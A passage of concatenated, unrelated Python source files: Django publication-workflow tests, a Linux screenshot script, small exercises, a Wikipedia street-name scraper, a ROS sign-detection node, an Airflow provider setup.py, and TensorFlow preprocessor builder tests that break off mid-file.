result = beam_job_domain.AggregateBeamJobRunResult('abc', '123')
self.assertEqual(result.stdout, 'abc')
self.assertEqual(result.stderr, '123')
def test_to_dict(self):
result = beam_job_domain.AggregateBeamJobRunResult('abc', '123')
self.assertEqual(result.to_dict(), {
'stdout': 'abc',
'stderr': '123',
})
|
 py | 1a4a014ab08777eec4aa70f7d70d5d9c9af24649 | # File with 2 functions to take a screenshot in Linux
import gi
gi.require_version('Gdk', '3.0')
from gi.repository import Gdk
from Xlib import display, X
from PIL import Image
# PIL
# Try to integrate with PIL to return a PIL Image
def screenShot1():
# full screenshot
window = Gdk.get_default_root_window()
pb = Gdk.pixbuf_get_from_window(window, *window.get_geometry())
pb.savev("full.png", "png", (), ())
# # screenshots for all windows
# window = Gdk.get_default_root_window()
# screen = window.get_screen()
# typ = window.get_type_hint()
# for i, w in enumerate(screen.get_window_stack()):
# pb = Gdk.pixbuf_get_from_window(w, *w.get_geometry())
# pb.savev("{}.png".format(i), "png", (), ())
# # screenshot active window
# screen = Gdk.get_default_root_window().get_screen()
# w = screen.get_active_window()
# pb = Gdk.pixbuf_get_from_window(w, *w.get_geometry())
# pb.savev("active.png", "png", (), ())
#Works with PIL, but too slow
def screenShot2():
dsp = display.Display()
root = dsp.screen().root
w = root.get_geometry().width
h = root.get_geometry().height
print(dsp.get_display_name(), w, h)
raw = root.get_image(0, 0, w, h, X.ZPixmap, 0xffffffff)
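    # The X server hands back 32-bit BGRX pixels; PIL's raw "BGRX" decoder drops the padding byte.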
image = Image.frombytes("RGB", (w, h), raw.data, "raw", "BGRX")
# image.show()
# image.save("teste.png")
return image
def performanceTest():
import time
counter=10
while counter:
print(time.perf_counter(), counter)
screenShot2()
counter -=1
# screenShot2()
performanceTest()
|
py | 1a4a01904f00a27ca32c8210239932c0acd7f548 | import logging
from django.contrib.admin.helpers import ACTION_CHECKBOX_NAME
from django.contrib.auth.models import User
from django.test.client import Client
from django.test.testcases import TestCase
from metashare import test_utils
from metashare.accounts.models import EditorGroup, EditorGroupManagers
from metashare.repository.models import resourceInfoType_model
from metashare.settings import DJANGO_BASE, ROOT_PATH, LOG_HANDLER
from metashare.storage.models import PUBLISHED, INGESTED, INTERNAL, REMOTE
# Setup logging support.
LOGGER = logging.getLogger(__name__)
LOGGER.addHandler(LOG_HANDLER)
ADMINROOT = '/{0}editor/repository/resourceinfotype_model/'.format(DJANGO_BASE)
class StatusWorkflowTest(TestCase):
resource_id = None
@classmethod
def setUpClass(cls):
"""
Import a resource to test the workflow changes for
"""
LOGGER.info("running '{}' tests...".format(cls.__name__))
test_utils.set_index_active(False)
test_utils.setup_test_storage()
_test_editor_group = \
EditorGroup.objects.create(name='test_editor_group')
_test_manager_group = \
EditorGroupManagers.objects.create(name='test_manager_group',
managed_group=_test_editor_group)
test_utils.create_manager_user(
'manageruser', '[email protected]', 'secret',
(_test_editor_group, _test_manager_group))
_fixture = '{0}/repository/fixtures/testfixture.xml'.format(ROOT_PATH)
_result = test_utils.import_xml(_fixture)
_result.editor_groups.add(_test_editor_group)
StatusWorkflowTest.resource_id = _result.id
@classmethod
def tearDownClass(cls):
"""
Clean up the test
"""
test_utils.clean_resources_db()
test_utils.clean_storage()
test_utils.clean_user_db()
test_utils.set_index_active(True)
LOGGER.info("finished '{}' tests".format(cls.__name__))
def test_can_publish_ingested(self):
client = Client()
client.login(username='manageruser', password='secret')
resource = resourceInfoType_model.objects.get(pk=self.resource_id)
resource.storage_object.publication_status = INGESTED
resource.storage_object.save()
client.post(ADMINROOT,
{"action": "publish_action", ACTION_CHECKBOX_NAME: resource.id},
follow=True)
# fetch the resource from DB as our object is not up-to-date anymore
resource = resourceInfoType_model.objects.get(pk=self.resource_id)
self.assertEquals('published', resource.publication_status())
def test_cannot_publish_internal(self):
client = Client()
client.login(username='manageruser', password='secret')
resource = resourceInfoType_model.objects.get(pk=self.resource_id)
resource.storage_object.publication_status = INTERNAL
resource.storage_object.save()
client.post(ADMINROOT,
{"action": "publish_action", ACTION_CHECKBOX_NAME: resource.id},
follow=True)
# fetch the resource from DB as our object is not up-to-date anymore
resource = resourceInfoType_model.objects.get(pk=self.resource_id)
self.assertEquals('internal', resource.publication_status())
def test_can_ingest_internal(self):
client = Client()
client.login(username='manageruser', password='secret')
resource = resourceInfoType_model.objects.get(pk=self.resource_id)
resource.storage_object.publication_status = INTERNAL
resource.storage_object.save()
client.post(ADMINROOT,
{"action": "ingest_action", ACTION_CHECKBOX_NAME: resource.id},
follow=True)
# fetch the resource from DB as our object is not up-to-date anymore
resource = resourceInfoType_model.objects.get(pk=self.resource_id)
self.assertEquals('ingested', resource.publication_status())
def test_cannot_ingest_published(self):
client = Client()
client.login(username='manageruser', password='secret')
resource = resourceInfoType_model.objects.get(pk=self.resource_id)
resource.storage_object.publication_status = PUBLISHED
resource.storage_object.save()
client.post(ADMINROOT,
{"action": "ingest_action", ACTION_CHECKBOX_NAME: resource.id},
follow=True)
# fetch the resource from DB as our object is not up-to-date anymore
resource = resourceInfoType_model.objects.get(pk=self.resource_id)
self.assertEquals('published', resource.publication_status())
def test_can_unpublish_published(self):
client = Client()
client.login(username='manageruser', password='secret')
resource = resourceInfoType_model.objects.get(pk=self.resource_id)
resource.storage_object.publication_status = PUBLISHED
resource.storage_object.save()
client.post(ADMINROOT,
{"action": "unpublish_action", ACTION_CHECKBOX_NAME: resource.id},
follow=True)
# fetch the resource from DB as our object is not up-to-date anymore
resource = resourceInfoType_model.objects.get(pk=self.resource_id)
self.assertEquals('ingested', resource.publication_status())
def test_cannot_unpublish_internal(self):
client = Client()
client.login(username='manageruser', password='secret')
resource = resourceInfoType_model.objects.get(pk=self.resource_id)
resource.storage_object.publication_status = INTERNAL
resource.storage_object.save()
client.post(ADMINROOT,
{"action": "unpublish_action", ACTION_CHECKBOX_NAME: resource.id},
follow=True)
# fetch the resource from DB as our object is not up-to-date anymore
resource = resourceInfoType_model.objects.get(pk=self.resource_id)
self.assertEquals('internal', resource.publication_status())
def test_cannot_change_publication_status_of_remote_copies(self):
# not even a superuser must change the publication status of a remote
# resource copy
superuser = User.objects.create_superuser(
"superuser", "[email protected]", "secret")
client = Client()
client.login(username=superuser.username, password='secret')
# import a temporary resource to not mess with the other tests and set
# the copy status to remote
resource = test_utils.import_xml(
'{0}/repository/fixtures/ILSP10.xml'.format(ROOT_PATH))
resource.storage_object.copy_status = REMOTE
# (1) verify that a status change from published is not possible:
resource.storage_object.publication_status = PUBLISHED
resource.storage_object.save()
client.post(ADMINROOT,
{"action": "unpublish_action", ACTION_CHECKBOX_NAME: resource.id},
follow=True)
# fetch the resource from DB as our object is not up-to-date anymore
resource = resourceInfoType_model.objects.get(pk=resource.id)
self.assertEquals('published', resource.publication_status())
# (2) verify that a status change from ingested is not possible:
resource.storage_object.publication_status = INGESTED
resource.storage_object.save()
client.post(ADMINROOT,
{"action": "publish_action", ACTION_CHECKBOX_NAME: resource.id},
follow=True)
# fetch the resource from DB as our object is not up-to-date anymore
resource = resourceInfoType_model.objects.get(pk=resource.id)
self.assertEquals('ingested', resource.publication_status())
|
py | 1a4a032a2e7bfbfaeb46dc90fc586987fe116284 | """[Practice: Deluxe Ice Cream Truck]
A quick note on inheritance syntax:

    class Ice(H2O):    # Ice is the child class, H2O is the parent class
        pass
"""
class Icecream:
max_scoops = 3
def __init__(self):
self.scoops = 0
def eat(self, scoops):
if self.scoops < scoops:
print("Not enough bites left!")
else:
self.scoops -= scoops
def add(self, scoops):
        self.scoops += scoops  # in-place update of the scoop count
if self.scoops > self.max_scoops:
self.scoops = 0
print("Too many scoops! Dropped ice cream.")
class IceCreamTruck:
    def __init__(self):
        self.sold = 0
def order(self, scoops):
ice_cream = Icecream()
self.add(ice_cream, scoops)
return ice_cream
def add(self, ice_cream, scoops):
ice_cream.add(scoops)
self.sold += scoops
class DeluxeIceCreamTruck(IceCreamTruck):
    # Practice completion (assumed behaviour, not from the handout): the deluxe
    # truck throws in one free bonus scoop with every order.
    def order(self, scoops):
        ice_cream = super().order(scoops)
        self.add(ice_cream, 1)  # bonus scoop
        return ice_cream
|
py | 1a4a0381074499fede395e870e7f560e7f3dae29 | class Solution:
def countLargestGroup(self, n: int) -> int:
dp=[0 for i in range(n+1)]
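        # dp[i] caches the digit sum of i: reuse the digit sum of i // 10 and add the last digit i % 10.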
for i in range(1,n+1):
b = i//10
dp[i] = dp[b] + (i%10)
        from collections import Counter  # normally provided by the LeetCode runtime; imported here so the file runs standalone
        c = Counter(dp[1:])
t = sorted(c.items(),key=lambda x: x[1],reverse=True)
n = t[0][1]
return len([x for x in t if x[1]==n])
"""
def sumdigit(m):
s = 0
while m>0:
s += m%10
m //= 10
return s
d = {}
for i in range(1,n+1):
k = sumdigit(i)
d[k] = d.get(k,0) + 1
v = d.items()
t = sorted(v,key=lambda x: x[1], reverse=True)
n = t[0][1]
return len([x for x in t if x[1]==n])
"""
|
py | 1a4a03f5bb9eed3b2311f18ffe4752c94e05c514 | # Your Code Here
def squared(a):
return a**2
# applyToEach and testList are provided by the exercise environment; minimal
# stand-ins (assumed) so this file also runs on its own:
def applyToEach(L, f):
    for i in range(len(L)):
        L[i] = f(L[i])
testList = [1, -4, 8, -9]
applyToEach(testList, squared)
|
py | 1a4a03fe8d4c4bf2c2c94ab3763643f422c36c5d | from bs4 import BeautifulSoup
import csv
from urllib.request import urlopen
from os.path import exists, join
from os import mkdir
from itertools import groupby
from operator import itemgetter
def read_page(url):
return urlopen(url).read()
def clean_comment(name_with_parenthesis):
return name_with_parenthesis.split("(")[0].strip()
def find_all_streets(html):
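    # Street names are the <li> items that appear before the page's second <h2> heading;
    # the asserts below guard against changes in the Wikipedia page layout.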
    soup = BeautifulSoup(html, "html.parser")
titles = soup.find_all("h2")
assert titles[0].text.startswith("Liste"), titles[0].text
assert titles[1].text.startswith("Voir aussi") or \
titles[1].text.startswith("Source") or \
titles[1].text.startswith("Par type"), titles[1].text
all_li = titles[1].find_all_previous("li")
labels = [clean_comment(li.text) for li in all_li if clean_comment(li.text) != ""]
return labels
# From https://docs.python.org/3/library/itertools.html#itertools-recipes
def unique_justseen(iterable, key=None):
"List unique elements, preserving order. Remember only the element just seen."
# unique_justseen('AAAABBBCCDAABBB') --> A B C D A B
# unique_justseen('ABBCcAD', str.lower) --> A B C A D
return map(next, map(itemgetter(1), groupby(iterable, key)))
def save_csv(records):
SAVE_DIR = 'data'
SAVE_FILE = join(SAVE_DIR, 'paris-streets.csv')
if not exists(SAVE_DIR):
mkdir(SAVE_DIR);
HEADER = ['street','arrondissement','from_url']
writer = csv.writer(open(SAVE_FILE, 'w'), lineterminator='\n')
writer.writerow(HEADER)
writer.writerows(records)
URLS = [
("https://fr.wikipedia.org/wiki/Liste_des_voies_du_1er_arrondissement_de_Paris", 1),
("https://fr.wikipedia.org/wiki/Liste_des_voies_du_2e_arrondissement_de_Paris", 2),
("https://fr.wikipedia.org/wiki/Liste_des_voies_du_3e_arrondissement_de_Paris", 3),
("https://fr.wikipedia.org/wiki/Liste_des_voies_du_4e_arrondissement_de_Paris", 4),
("https://fr.wikipedia.org/wiki/Liste_des_voies_du_5e_arrondissement_de_Paris", 5),
("https://fr.wikipedia.org/wiki/Liste_des_voies_du_6e_arrondissement_de_Paris", 6),
("https://fr.wikipedia.org/wiki/Liste_des_voies_du_7e_arrondissement_de_Paris", 7),
("https://fr.wikipedia.org/wiki/Liste_des_voies_du_8e_arrondissement_de_Paris", 8),
("https://fr.wikipedia.org/wiki/Liste_des_voies_du_9e_arrondissement_de_Paris", 9),
("https://fr.wikipedia.org/wiki/Liste_des_voies_du_10e_arrondissement_de_Paris", 10),
("https://fr.wikipedia.org/wiki/Liste_des_voies_du_11e_arrondissement_de_Paris", 11),
("https://fr.wikipedia.org/wiki/Liste_des_voies_du_12e_arrondissement_de_Paris", 12),
# ("https://fr.wikipedia.org/wiki/Liste_des_voies_du_bois_de_Vincennes", 12),
("https://fr.wikipedia.org/wiki/Liste_des_voies_du_13e_arrondissement_de_Paris", 13),
("https://fr.wikipedia.org/wiki/Liste_des_voies_du_14e_arrondissement_de_Paris", 14),
("https://fr.wikipedia.org/wiki/Liste_des_voies_du_15e_arrondissement_de_Paris", 15),
("https://fr.wikipedia.org/wiki/Liste_des_voies_du_16e_arrondissement_de_Paris", 16),
# ("https://fr.wikipedia.org/wiki/Liste_des_voies_du_bois_de_Boulogne", 16),
("https://fr.wikipedia.org/wiki/Liste_des_voies_du_17e_arrondissement_de_Paris", 17),
("https://fr.wikipedia.org/wiki/Liste_des_voies_du_18e_arrondissement_de_Paris", 18),
("https://fr.wikipedia.org/wiki/Liste_des_voies_du_19e_arrondissement_de_Paris", 19),
("https://fr.wikipedia.org/wiki/Liste_des_voies_du_20e_arrondissement_de_Paris", 20),
]
records = []
for (url, num_arrondissement) in URLS:
print("Scraping {}\n".format(url))
html = read_page(url)
arrondissement_records = [(street, num_arrondissement, url) for street in find_all_streets(html)]
    # Sorting ensures easy tracking of modifications in git
arrondissement_records.sort(key=lambda s: s[0].lower())
records += unique_justseen(arrondissement_records)
save_csv(records)
|
py | 1a4a047ece9004bd674c758af39669c9497313b5 | #!/usr/bin/env python
import rospy
import json
from cv_bridge import CvBridge, CvBridgeError
from sensor_msgs.msg import Image, CompressedImage
import cv2
import numpy as np
from wr8_ai.yolo import fps
import wr8_ai.detector_ncs as det
import time
class ImageReceiverROS:
def __init__(self):
self.bridge = CvBridge()
self.image_sub = rospy.Subscriber("camera", Image, self.callback_img, queue_size=1)
self.image_sub = rospy.Subscriber("camera_compr", CompressedImage, self.callback_img_compressed, queue_size=1)
self.cv_image = None
self.cv_image_comp = None
def callback_img(self, data):
try:
self.cv_image = self.bridge.imgmsg_to_cv2(data, "bgr8")
except CvBridgeError as e:
rospy.logwarn(e)
def callback_img_compressed(self, data):
        np_arr = np.frombuffer(data.data, np.uint8)
self.cv_image_comp = cv2.imdecode(np_arr, cv2.IMREAD_COLOR)
def get_image(self):
return self.cv_image
def get_image_compressed(self):
return self.cv_image_comp
class ImagePublisherROS:
def __init__(self):
self.bridge = CvBridge()
        self.image_pub = rospy.Publisher("netout/compressed", CompressedImage, queue_size=1)
def publish(self, cv_image):
msg = CompressedImage()
msg.header.stamp = rospy.Time.now()
msg.format = "png"
        msg.data = np.array(cv2.imencode('.png', cv_image)[1]).tobytes()
self.image_pub.publish(msg)
def main():
rospy.init_node('test_signs')
graph_path = rospy.get_param('~graph_path')
config_path = rospy.get_param('~config_path')
fps_msr = rospy.get_param('~fps_msr', True)
fps_meter = fps.FPSMeter()
rospy.loginfo('Start processing')
detector = det.DetectorNCS()
if not detector.init(0, graph_path, config_path):
rospy.logerr('Failed to initialize detector')
img_rcvr = ImageReceiverROS()
img_pub = ImagePublisherROS()
skip_cntr = 0
while not rospy.is_shutdown():
image = img_rcvr.get_image_compressed()
if image is None:
rospy.sleep(0.01) # 10 ms
skip_cntr += 1
if skip_cntr > 300:
rospy.logwarn('No image for 3 seconds...')
skip_cntr = 0
continue
render_img = image.copy()
start = time.time()
boxes, box_img = detector.get_signs(cv_img=image, render_img=render_img)
if fps_msr:
fps_meter.update(time.time() - start)
if fps_meter.milliseconds > 5000:
fps_meter.print_statistics()
fps_meter.reset()
img_pub.publish(box_img)
# cv2.imshow('2', image)
# key = cv2.waitKey(10)
# if key == 27:
# break
# cv2.destroyAllWindows()
if __name__ == '__main__':
main()
|
py | 1a4a05fc905beac0fdd2a167103ffa89a89c925a | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# NOTE! THIS FILE IS AUTOMATICALLY GENERATED AND WILL BE\
# OVERWRITTEN WHEN RUNNING
#
# ./breeze prepare-provider-readme
#
# IF YOU WANT TO MODIFY IT, YOU SHOULD MODIFY THE TEMPLATE
# `SETUP_TEMPLATE.py.jinja2` IN the `provider_packages` DIRECTORY
"""Setup.py for the apache-airflow-backport-providers-jira package."""
import logging
import os
import sys
from os.path import dirname
from setuptools import find_packages, setup
logger = logging.getLogger(__name__)
version = '2020.10.29'
my_dir = dirname(__file__)
try:
with open(
os.path.join(my_dir, 'airflow/providers/jira/BACKPORT_PROVIDER_README.md'), encoding='utf-8'
) as f:
long_description = f.read()
except FileNotFoundError:
long_description = ''
def do_setup(version_suffix_for_pypi=''):
"""Perform the package apache-airflow-backport-providers-jira setup."""
setup(
name='apache-airflow-backport-providers-jira',
description='Backport provider package apache-airflow-backport-providers-jira for Apache Airflow',
long_description=long_description,
long_description_content_type='text/markdown',
license='Apache License 2.0',
version=version + version_suffix_for_pypi,
packages=find_packages(include=['airflow.providers.jira*']),
zip_safe=False,
install_requires=['apache-airflow~=1.10', 'JIRA>1.0.7'],
setup_requires=['setuptools', 'wheel'],
extras_require={},
classifiers=[
'Development Status :: 5 - Production/Stable',
'Environment :: Console',
'Environment :: Web Environment',
'Intended Audience :: Developers',
'Intended Audience :: System Administrators',
'License :: OSI Approved :: Apache Software License',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Topic :: System :: Monitoring',
],
author='Apache Software Foundation',
author_email='[email protected]',
url='http://airflow.apache.org/',
download_url=('https://archive.apache.org/dist/airflow/backport-providers'),
python_requires='~=3.6',
project_urls={
'Documentation': 'https://airflow.apache.org/docs/',
'Bug Tracker': 'https://github.com/apache/airflow/issues',
'Source Code': 'https://github.com/apache/airflow',
},
)
#
# Note that --version-suffix-for-pypi should only be used in case we generate RC packages for PyPI
# Those packages should have actual RC version in order to be published even if source version
# should be the final one.
#
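# Example invocation (hypothetical RC build): python setup.py --version-suffix-for-pypi rc1 sdist bdist_wheel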
if __name__ == "__main__":
suffix = ''
if len(sys.argv) > 1 and sys.argv[1] == "--version-suffix-for-pypi":
if len(sys.argv) < 3:
print("ERROR! --version-suffix-for-pypi needs parameter!", file=sys.stderr)
sys.exit(1)
suffix = sys.argv[2]
sys.argv = [sys.argv[0]] + sys.argv[3:]
do_setup(version_suffix_for_pypi=suffix)
|
py | 1a4a07e75d6da0c67f60815eb6557d1e2b2bf3c1 | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for preprocessor_builder."""
import tensorflow as tf
from google.protobuf import text_format
from object_detection.builders import preprocessor_builder
from object_detection.core import preprocessor
from object_detection.protos import preprocessor_pb2
class PreprocessorBuilderTest(tf.test.TestCase):
def assert_dictionary_close(self, dict1, dict2):
"""Helper to check if two dicts with floatst or integers are close."""
self.assertEqual(sorted(dict1.keys()), sorted(dict2.keys()))
for key in dict1:
value = dict1[key]
if isinstance(value, float):
self.assertAlmostEqual(value, dict2[key])
else:
self.assertEqual(value, dict2[key])
def test_build_normalize_image(self):
preprocessor_text_proto = """
normalize_image {
original_minval: 0.0
original_maxval: 255.0
target_minval: -1.0
target_maxval: 1.0
}
"""
preprocessor_proto = preprocessor_pb2.PreprocessingStep()
text_format.Merge(preprocessor_text_proto, preprocessor_proto)
function, args = preprocessor_builder.build(preprocessor_proto)
self.assertEqual(function, preprocessor.normalize_image)
self.assertEqual(args, {
'original_minval': 0.0,
'original_maxval': 255.0,
'target_minval': -1.0,
'target_maxval': 1.0,
})
def test_build_random_horizontal_flip(self):
preprocessor_text_proto = """
random_horizontal_flip {
keypoint_flip_permutation: 1
keypoint_flip_permutation: 0
keypoint_flip_permutation: 2
keypoint_flip_permutation: 3
keypoint_flip_permutation: 5
keypoint_flip_permutation: 4
probability: 0.5
}
"""
preprocessor_proto = preprocessor_pb2.PreprocessingStep()
text_format.Merge(preprocessor_text_proto, preprocessor_proto)
function, args = preprocessor_builder.build(preprocessor_proto)
self.assertEqual(function, preprocessor.random_horizontal_flip)
self.assertEqual(args, {'keypoint_flip_permutation': (1, 0, 2, 3, 5, 4),
'probability': 0.5})
def test_build_random_vertical_flip(self):
preprocessor_text_proto = """
random_vertical_flip {
keypoint_flip_permutation: 1
keypoint_flip_permutation: 0
keypoint_flip_permutation: 2
keypoint_flip_permutation: 3
keypoint_flip_permutation: 5
keypoint_flip_permutation: 4
probability: 0.5
}
"""
preprocessor_proto = preprocessor_pb2.PreprocessingStep()
text_format.Merge(preprocessor_text_proto, preprocessor_proto)
function, args = preprocessor_builder.build(preprocessor_proto)
self.assertEqual(function, preprocessor.random_vertical_flip)
self.assertEqual(args, {'keypoint_flip_permutation': (1, 0, 2, 3, 5, 4),
'probability': 0.5})
def test_build_random_rotation90(self):
preprocessor_text_proto = """
random_rotation90 {
keypoint_rot_permutation: 3
keypoint_rot_permutation: 0
keypoint_rot_permutation: 1
keypoint_rot_permutation: 2
probability: 0.5
}
"""
preprocessor_proto = preprocessor_pb2.PreprocessingStep()
text_format.Merge(preprocessor_text_proto, preprocessor_proto)
function, args = preprocessor_builder.build(preprocessor_proto)
self.assertEqual(function, preprocessor.random_rotation90)
self.assertEqual(args, {'keypoint_rot_permutation': (3, 0, 1, 2),
'probability': 0.5})
def test_build_random_pixel_value_scale(self):
preprocessor_text_proto = """
random_pixel_value_scale {
minval: 0.8
maxval: 1.2
}
"""
preprocessor_proto = preprocessor_pb2.PreprocessingStep()
text_format.Merge(preprocessor_text_proto, preprocessor_proto)
function, args = preprocessor_builder.build(preprocessor_proto)
self.assertEqual(function, preprocessor.random_pixel_value_scale)
self.assert_dictionary_close(args, {'minval': 0.8, 'maxval': 1.2})
def test_build_random_image_scale(self):
preprocessor_text_proto = """
random_image_scale {
min_scale_ratio: 0.8
max_scale_ratio: 2.2
}
"""
preprocessor_proto = preprocessor_pb2.PreprocessingStep()
text_format.Merge(preprocessor_text_proto, preprocessor_proto)
function, args = preprocessor_builder.build(preprocessor_proto)
self.assertEqual(function, preprocessor.random_image_scale)
self.assert_dictionary_close(args, {'min_scale_ratio': 0.8,
'max_scale_ratio': 2.2})
def test_build_random_rgb_to_gray(self):
preprocessor_text_proto = """
random_rgb_to_gray {
probability: 0.8
}
"""
preprocessor_proto = preprocessor_pb2.PreprocessingStep()
text_format.Merge(preprocessor_text_proto, preprocessor_proto)
function, args = preprocessor_builder.build(preprocessor_proto)
self.assertEqual(function, preprocessor.random_rgb_to_gray)
self.assert_dictionary_close(args, {'probability': 0.8})
def test_build_random_adjust_brightness(self):
preprocessor_text_proto = """
random_adjust_brightness {
max_delta: 0.2
}
"""
preprocessor_proto = preprocessor_pb2.PreprocessingStep()
text_format.Merge(preprocessor_text_proto, preprocessor_proto)
function, args = preprocessor_builder.build(preprocessor_proto)
self.assertEqual(function, preprocessor.random_adjust_brightness)
self.assert_dictionary_close(args, {'max_delta': 0.2})
def test_build_random_adjust_contrast(self):
preprocessor_text_proto = """
random_adjust_contrast {
min_delta: 0.7
max_delta: 1.1
}
"""
preprocessor_proto = preprocessor_pb2.PreprocessingStep()
text_format.Merge(preprocessor_text_proto, preprocessor_proto)
function, args = preprocessor_builder.build(preprocessor_proto)
self.assertEqual(function, preprocessor.random_adjust_contrast)
self.assert_dictionary_close(args, {'min_delta': 0.7, 'max_delta': 1.1})
def test_build_random_adjust_hue(self):
preprocessor_text_proto = """
random_adjust_hue {
max_delta: 0.01
}
"""
preprocessor_proto = preprocessor_pb2.PreprocessingStep()
text_format.Merge(preprocessor_text_proto, preprocessor_proto)
function, args = preprocessor_builder.build(preprocessor_proto)
self.assertEqual(function, preprocessor.random_adjust_hue)
self.assert_dictionary_close(args, {'max_delta': 0.01})
def test_build_random_adjust_saturation(self):
preprocessor_text_proto = """
random_adjust_saturation {
min_delta: 0.75
max_delta: 1.15
}
"""
preprocessor_proto = preprocessor_pb2.PreprocessingStep()
text_format.Merge(preprocessor_text_proto, preprocessor_proto)
function, args = preprocessor_builder.build(preprocessor_proto)
self.assertEqual(function, preprocessor.random_adjust_saturation)
self.assert_dictionary_close(args, {'min_delta': 0.75, 'max_delta': 1.15})
def test_build_random_distort_color(self):
preprocessor_text_proto = """
random_distort_color {
color_ordering: 1
}
"""
preprocessor_proto = preprocessor_pb2.PreprocessingStep()
text_format.Merge(preprocessor_text_proto, preprocessor_proto)
function, args = preprocessor_builder.build(preprocessor_proto)
self.assertEqual(function, preprocessor.random_distort_color)
self.assertEqual(args, {'color_ordering': 1})
def test_build_random_jitter_boxes(self):
preprocessor_text_proto = """
random_jitter_boxes {
ratio: 0.1
jitter_mode: SHRINK
}
"""
preprocessor_proto = preprocessor_pb2.PreprocessingStep()
text_format.Merge(preprocessor_text_proto, preprocessor_proto)
function, args = preprocessor_builder.build(preprocessor_proto)
self.assertEqual(function, preprocessor.random_jitter_boxes)
self.assert_dictionary_close(args, {'ratio': 0.1, 'jitter_mode': 'shrink'})
def test_build_random_crop_image(self):
preprocessor_text_proto = """
random_crop_image {
min_object_covered: 0.75
min_aspect_ratio: 0.75
max_aspect_ratio: 1.5
min_area: 0.25
max_area: 0.875
overlap_thresh: 0.5
clip_boxes: False
random_coef: 0.125
}
"""
preprocessor_proto = preprocessor_pb2.PreprocessingStep()
text_format.Merge(preprocessor_text_proto, preprocessor_proto)
function, args = preprocessor_builder.build(preprocessor_proto)
self.assertEqual(function, preprocessor.random_crop_image)
self.assertEqual(args, {
'min_object_covered': 0.75,
'aspect_ratio_range': (0.75, 1.5),
'area_range': (0.25, 0.875),
'overlap_thresh': 0.5,
'clip_boxes': False,
'random_coef': 0.125,
})
def test_build_random_pad_image(self):
preprocessor_text_proto = """
random_pad_image {
}
"""
preprocessor_proto = preprocessor_pb2.PreprocessingStep()
text_format.Merge(preprocessor_text_proto, preprocessor_proto)
function, args = preprocessor_builder.build(preprocessor_proto)
self.assertEqual(function, preprocessor.random_pad_image)
self.assertEqual(args, {
'min_image_size': None,
'max_image_size': None,
'pad_color': None,
})
def test_build_random_absolute_pad_image(self):
preprocessor_text_proto = """
random_absolute_pad_image {
max_height_padding: 50
max_width_padding: 100
}
"""
preprocessor_proto = preprocessor_pb2.PreprocessingStep()
text_format.Merge(preprocessor_text_proto, preprocessor_proto)
function, args = preprocessor_builder.build(preprocessor_proto)
self.assertEqual(function, preprocessor.random_absolute_pad_image)
self.assertEqual(args, {
'max_height_padding': 50,
'max_width_padding': 100,
'pad_color': None,
})
def test_build_random_crop_pad_image(self):
preprocessor_text_proto = """
random_crop_pad_image {
min_object_covered: 0.75
min_aspect_ratio: 0.75
max_aspect_ratio: 1.5
min_area: 0.25
max_area: 0.875
overlap_thresh: 0.5
clip_boxes: False
random_coef: 0.125
}
"""
preprocessor_proto = preprocessor_pb2.PreprocessingStep()
text_format.Merge(preprocessor_text_proto, preprocessor_proto)
function, args = preprocessor_builder.build(preprocessor_proto)
self.assertEqual(function, preprocessor.random_crop_pad_image)
self.assertEqual(args, {
'min_object_covered': 0.75,
'aspect_ratio_range': (0.75, 1.5),
'area_range': (0.25, 0.875),
'overlap_thresh': 0.5,
'clip_boxes': False,
'random_coef': 0.125,
'pad_color': None,
})
def test_build_random_crop_pad_image_with_optional_parameters(self):
preprocessor_text_proto = """
random_crop_pad_image {
min_object_covered: 0.75
min_aspect_ratio: 0.75
max_aspect_ratio: 1.5
min_area: 0.25
max_area: 0.875
overlap_thresh: 0.5
clip_boxes: False
random_coef: 0.125
min_padded_size_ratio: 0.5
min_padded_size_ratio: 0.75
max_padded_size_ratio: 0.5
max_padded_size_ratio: 0.75
}
"""
preprocessor_proto = preprocessor_pb2.PreprocessingStep()
text_format.Merge(preprocessor_text_proto, preprocessor_proto)
function, args = preprocessor_builder.build(preprocessor_proto)
self.assertEqual(function, preprocessor.random_crop_pad_image)
self.assertEqual(args, {
'min_object_covered': 0.75,
'aspect_ratio_range': (0.75, 1.5),
'area_range': (0.25, 0.875),
'overlap_thresh': 0.5,
'clip_boxes': False,
'random_coef': 0.125,
'min_padded_size_ratio': (0.5, 0.75),
'max_padded_size_ratio': (0.5, 0.75),
'pad_color': None,
})
def test_build_random_crop_to_aspect_ratio(self):
preprocessor_text_proto = """
random_crop_to_aspect_ratio {
aspect_ratio: 0.85
overlap_thresh: 0.35
clip_boxes: False
}
"""
preprocessor_proto = preprocessor_pb2.PreprocessingStep()
text_format.Merge(preprocessor_text_proto, preprocessor_proto)
function, args = preprocessor_builder.build(preprocessor_proto)
self.assertEqual(function, preprocessor.random_crop_to_aspect_ratio)
self.assert_dictionary_close(args, {'aspect_ratio': 0.85,
'overlap_thresh': 0.35,
'clip_boxes': False})
def test_build_random_black_patches(self):
preprocessor_text_proto = """
random_black_patches {
max_black_patches: 20
probability: 0.95
size_to_image_ratio: 0.12
}
"""
preprocessor_proto = preprocessor_pb2.PreprocessingStep()
text_format.Merge(preprocessor_text_proto, preprocessor_proto)
function, args = preprocessor_builder.build(preprocessor_proto)
self.assertEqual(function, preprocessor.random_black_patches)
self.assert_dictionary_close(args, {'max_black_patches': 20,
'probability': 0.95,
'size_to_image_ratio': 0.12})
def test_build_random_jpeg_quality(self):
preprocessor_text_proto = """
random_jpeg_quality {
random_coef: 0.5
min_jpeg_quality: 40
max_jpeg_quality: 90
}
"""
